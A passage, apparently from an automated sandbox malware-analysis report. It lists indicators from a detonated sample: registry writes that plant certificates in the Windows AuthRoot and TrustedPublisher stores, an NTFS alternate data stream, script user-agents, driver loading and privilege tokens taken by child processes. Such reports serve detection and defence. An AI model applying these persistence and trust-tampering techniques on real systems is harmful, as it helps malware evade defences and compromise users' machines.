6aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 tapinstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 tapinstall.exe -
NTFS ADS 1 IoCs
Processes:
uP11qo3Gz.exedescription ioc process File created C:\Users\Admin\AppData\Local\Temp\RarSFX0\Readme.txt:meta uP11qo3Gz.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 8 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 91 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 45 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 47 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 51 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 58 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 60 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 61 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 63 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
multitimer.exemultitimer.exepid process 3812 multitimer.exe 3812 multitimer.exe 3812 multitimer.exe 3812 multitimer.exe 3812 multitimer.exe 3812 multitimer.exe 3812 multitimer.exe 3812 multitimer.exe 3812 multitimer.exe 3812 multitimer.exe 3812 multitimer.exe 3812 multitimer.exe 3812 multitimer.exe 3812 multitimer.exe 3812 multitimer.exe 3812 multitimer.exe 3812 multitimer.exe 3812 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe 2060 multitimer.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 624 624 -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
seed.exeMicrosoftEdgeCP.exe4DB7.exe5EE0.exepid process 4780 seed.exe 8 MicrosoftEdgeCP.exe 812 4DB7.exe 5372 5EE0.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
df73c80c3b297b161dd6681a354b9392.exemultitimer.exemultitimer.exemultitimer.exe4erji2va4ov.exe3aa05242ojx.exevpn.tmpMicrosoftEdge.exeapp.exesvchost.exeMicrosoftEdgeCP.exesvchost.exetapinstall.exeDrvInst.exesvchost.exedescription pid process Token: SeDebugPrivilege 988 df73c80c3b297b161dd6681a354b9392.exe Token: SeDebugPrivilege 2484 multitimer.exe Token: SeDebugPrivilege 3812 multitimer.exe Token: SeDebugPrivilege 2060 multitimer.exe Token: SeDebugPrivilege 3260 4erji2va4ov.exe Token: SeDebugPrivilege 3144 3aa05242ojx.exe Token: SeDebugPrivilege 1228 vpn.tmp Token: SeDebugPrivilege 1228 vpn.tmp Token: SeShutdownPrivilege 3128 Token: SeCreatePagefilePrivilege 3128 Token: SeShutdownPrivilege 3128 Token: SeCreatePagefilePrivilege 3128 Token: SeShutdownPrivilege 3128 Token: SeCreatePagefilePrivilege 3128 Token: SeShutdownPrivilege 3128 Token: SeCreatePagefilePrivilege 3128 Token: SeShutdownPrivilege 3128 Token: SeCreatePagefilePrivilege 3128 Token: SeShutdownPrivilege 3128 Token: SeCreatePagefilePrivilege 3128 Token: SeDebugPrivilege 4332 MicrosoftEdge.exe Token: SeDebugPrivilege 4332 MicrosoftEdge.exe Token: SeDebugPrivilege 4332 MicrosoftEdge.exe Token: SeDebugPrivilege 4332 MicrosoftEdge.exe Token: SeShutdownPrivilege 3128 Token: SeCreatePagefilePrivilege 3128 Token: SeShutdownPrivilege 3128 Token: SeCreatePagefilePrivilege 3128 Token: SeDebugPrivilege 1392 app.exe Token: SeImpersonatePrivilege 1392 app.exe Token: SeTcbPrivilege 4260 svchost.exe Token: SeTcbPrivilege 4260 svchost.exe Token: SeDebugPrivilege 4620 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4620 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4620 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4620 MicrosoftEdgeCP.exe Token: SeShutdownPrivilege 3128 Token: SeCreatePagefilePrivilege 3128 Token: SeShutdownPrivilege 3128 Token: SeCreatePagefilePrivilege 3128 Token: SeShutdownPrivilege 3128 Token: SeCreatePagefilePrivilege 3128 Token: SeAuditPrivilege 4300 svchost.exe Token: SeSecurityPrivilege 4300 svchost.exe Token: SeBackupPrivilege 4260 svchost.exe Token: SeRestorePrivilege 4260 svchost.exe Token: SeBackupPrivilege 4260 svchost.exe Token: SeRestorePrivilege 4260 svchost.exe Token: SeLoadDriverPrivilege 4848 tapinstall.exe Token: SeRestorePrivilege 5200 DrvInst.exe Token: SeBackupPrivilege 5200 DrvInst.exe Token: SeLoadDriverPrivilege 5200 DrvInst.exe Token: SeLoadDriverPrivilege 5200 DrvInst.exe Token: SeLoadDriverPrivilege 5200 DrvInst.exe Token: SeBackupPrivilege 4260 svchost.exe Token: SeRestorePrivilege 4260 svchost.exe Token: SeShutdownPrivilege 3128 Token: SeCreatePagefilePrivilege 3128 Token: SeShutdownPrivilege 3128 